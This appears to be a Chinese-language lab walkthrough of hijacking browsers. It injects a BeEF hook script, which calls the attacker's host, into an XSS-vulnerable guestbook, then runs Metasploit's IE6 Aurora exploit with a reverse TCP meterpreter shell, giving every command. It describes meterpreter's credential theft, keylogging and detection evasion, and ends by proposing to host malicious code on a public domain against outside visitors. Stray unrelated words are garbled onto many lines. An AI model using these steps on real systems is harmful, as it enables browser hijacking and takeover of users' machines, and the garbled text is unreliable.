環境:web
1.Kali(使用beef生成惡意代碼,IP:192.168.114.140)shell
2.一臺web服務器(留言板存在XSS跨站腳本漏洞,IP:192.168.114.204)windows
3. 客戶端(用於訪問web服務器,IP:192.168.114.130)瀏覽器
步驟:服務器
1. Kali使用beef生成惡意代碼網絡
2. 將惡意代碼寫入192.168.114.204網站留言板session
3. 只要客戶端訪問這個服務器的留言板,客戶端瀏覽器就會被劫持框架
目的:tcp
控制目標主機的瀏覽器,經過目標主機瀏覽器得到該主機的詳細信息,並進一步掃描內網,配合metasploit進行內網滲透工具
如下爲具體操做:
首先我在window server 2003上搭建IIS服務器,在站長之家找了一個存在XSS漏洞的留言板源碼(我心依然留言板),發佈到IIS服務器上。
用WVS掃了一下,確實存在XSS漏洞:
啓動成功後:
瀏覽器輸入:http://127.0.0.1:3000/ui/panel,Usename與Password均爲beef:
將如上圖所示的Hook URL寫入web服務器存在XSS漏洞的留言板中<scriptsrc="http://192.168.114.140:3000/hook.js"></script>
若是留言被管理員審覈經過,你的留言能在留言板顯示出來。當客戶端訪問服務器的留言板後,你能夠在Beef控制端查看目標主機,若是出現下圖所示內網,表示客戶端瀏覽器已經被成功劫持
在Current Browser項選擇Browser,點擊Hooked Domain選擇Redirect Browser,在右邊的Redirect URL中輸入網址,便可控制瀏覽器跳轉到目標網址
Kali收藏欄找到metasploit framework
也能夠新建終端輸入:msfconsole,啓動成功後:
輸入如下命令:
1.search ms10_002(尋找ms10_002漏洞)
2.useexploit/windows/browser/ms10_002_aurora(使用ms10_002極光漏洞)
3.set payloadwindows/meterpreter/reverse_tcp(設置TCP回連攻擊載荷)
4.show options(查看漏洞利用工具選項)
5.set srvhost 192.168.114.140(配置客戶端訪問的目標地址,這裏是Kali本機的IP地址)
6.set srvport 7777(訪問的端口號)
7.set uripath /(網站根路徑)
8.set lhost 192.168.114.140(設置本地接收地址)
9.set lport 4444(端口號)
10.show options (查看是否更改過來)
11.exploit(執行利用,出現以下所示表示執行成功)
利用Beef生成的惡意代碼植入到存在XSS漏洞的web服務器(12.168.114.204),客戶端(192.168.114.130)瀏覽植入惡意代碼的網頁,形成客戶端瀏覽器被劫持。當前客戶端使用的環境爲windows XP+IE6,咱們使用metasploit framework工具針對IE6的ms10_002極光漏洞進行利用,控制客戶端被劫持的瀏覽器訪問192.168.114.140:7777,觸發該漏洞,經過漏洞拿到客戶端的權限shell,回連192.168.114.140:4444,從而達到控制客戶端系統的目的。
因爲筆者的XP+IE6環境沒有搭好,如下用的firefox瀏覽器演示命令執行,跳轉以後的效果:
如何查看這個shell,咱們在Kali中的metasploit終端按下回車。輸入sessions –i(因爲用的firefox瀏覽器,因此沒有成功獲取session)
我在網上找了張圖,當成功利用,顯示以下:
根據sessions的Id,輸入sessions -i 1,獲得meterpreter:
meterpreter是metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個meterpretershell的連接。meterpretershell做爲滲透模塊有不少有用的功能,好比添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。另外meterpreter可以躲避入侵檢測系統。在遠程主機上隱藏本身,它不改變系統硬盤中的文件,所以HIDS[基於主機的入侵檢測系統]很難對它作出響應。此外它在運行的時候系統時間是變化的,因此跟蹤它或者終止它對於一個有經驗的人也會變得很是困難。
輸入shell就能夠拿到目標主機的一個cmd
而後就能夠作任何想作的事好比net user 建立用戶等
想要使用metasploit,固然要配合漏洞進行利用,如下爲漏洞發佈網站,能夠常常去看看:
https://www.exploit-db.com/
僅我的的一些想法,若是不對請指正:利用本機爲Web服務器,購買域名,並將域名解析至本機IP地址,在本機的網站上寫入惡意代碼。當外網客戶端經過域名訪問我本機搭建的網站,致使瀏覽器被劫持。